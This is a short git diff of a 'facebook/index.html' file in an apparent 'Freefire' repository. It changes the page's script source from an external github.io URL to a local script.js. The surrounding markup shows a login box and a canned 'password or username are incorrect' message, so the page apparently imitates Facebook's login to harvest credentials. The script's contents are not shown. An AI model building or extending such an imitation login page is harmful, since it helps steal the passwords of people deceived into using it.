--- a/facebook/index.html
+++ b/facebook/index.html
@@ -116,7 +116,7 @@
     </style>
 </head>
 <body>
-    <script src="https://sharmapushkar-coder.github.io/Freefire/facebook/script.js"></script>
+    <script src="script.js"></script>
     <div class="msg"id="msg"style="color:red;display:none;"><p>Your password or username are incorrect</p></div>
     <div class="container">
         <div class="login-box">
